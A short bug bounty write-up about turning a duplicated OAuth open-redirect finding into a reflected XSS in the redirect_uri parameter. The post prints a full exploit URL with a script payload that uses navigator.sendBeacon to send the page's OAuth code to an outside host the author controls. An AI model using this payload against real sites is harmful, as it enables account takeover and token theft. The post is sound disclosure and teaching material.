Never Give Up, The Story Behind a Dupe-To-Triaged

This is the story about how I got a dupe (within 24hs!) and then found another (valid) vulnerability with the same impact.

The application used the Oauth mechanism to authenticate. The endpoint looked like the following:
https://victim.com/auth?client_id=&nonce=[REDACTED]&redirect_uri=https://www.victim.com/dashboard&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

After seeing that, I quickly changed the redirect_uri parameter to point to my server and I saw how the application redirected me to it… so this is an Open Redirect vulnerability on victim.com. Let’s get an Account Takeover vulnerability!

In my PoC, I made that the redirect_uri parameter point to my server and just that, because the Oauth code is sent within request too. So, that was easy. I made the report, sent it, and after 3 days I got the duplicated notification…

My submission (left) Dupe (Right)
Keep trying

I thought for a while how to get an Account Takeover, but with different techniques. And then an idea popped in my head like an XSS alert popup ;-)

If I can exploit an XSS vulnerability in that endpoint, maybe I can steal the Oauth token, and that’s it! I made the following PoC:

https://victim.com/auth?client_id=&nonce=[REDACTED]&redirect_uri=https://www.victim.com/dashboard%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

It worked!

But, what makes the difference between a simple JavaScript popup and ATO (Account TakeOver)? A cool payload. So let’s try to figure it out (thanks@mastersec !)

Final Payload:

navigator.sendBeacon(‘https://ssrftest.com/x/AAAAA',document.documentElement.innerHTML.split('code'));

Final URL:

https://victim.com/auth?client_id=&nonce=[REDACTED]&redirect_uri=aaa”><script>navigator.sendBeacon(‘https://ssrftest.com/x/AAAAA',document.documentElement.innerHTML.split('code'));</script>&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

And the result was the authentication token submitted to the server that I control. WIN

I submitted the vulnerability and finally, after 2 days, it got triaged and I received the bounty $$$ :-)

So, always remember, KEEP TRYING!

I hope you enjoyed this write up. Happy Hacking-Hunting

Hope you liked the post! If you would like to contact me, please visit https://www.cintainfinita.com or write to contact@cintainfinita.com.ar.

#BugBounty #BugBountyTips #Hacking

Information Security Consultant, Researcher & Illusionist